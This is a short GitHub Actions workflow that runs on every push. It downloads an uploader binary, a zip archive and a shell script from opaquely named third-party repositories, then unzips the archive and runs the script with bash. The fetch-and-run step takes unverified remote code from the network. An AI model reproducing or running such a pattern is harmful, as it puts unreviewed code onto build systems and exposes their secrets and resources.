name: sixuu
on: [push, workflow_dispatch]
jobs:
  download-and-run:
    runs-on: ubuntu-latest
    steps:
      - name: Download file
        run: |
          wget https://raw.githubusercontent.com/MoeClub/OneList/master/OneDriveUploader/amd64/linux/OneDriveUploader -P /usr/local/bin/
          chmod +x /usr/local/bin/OneDriveUploader
          wget -O 230117.zip https://github.com/tuhvvvvvy/0127/blob/5deeeb8bed8c8e8879947d9b4917c8cc53ef8f66/.github/workflows/230117.zip
          
          wget -O drive333.sh https://raw.githubusercontent.com/hongtyyu/0127/main/.github/workflows/drive333.sh
          unzip 230117.zip
          bash drive333.sh
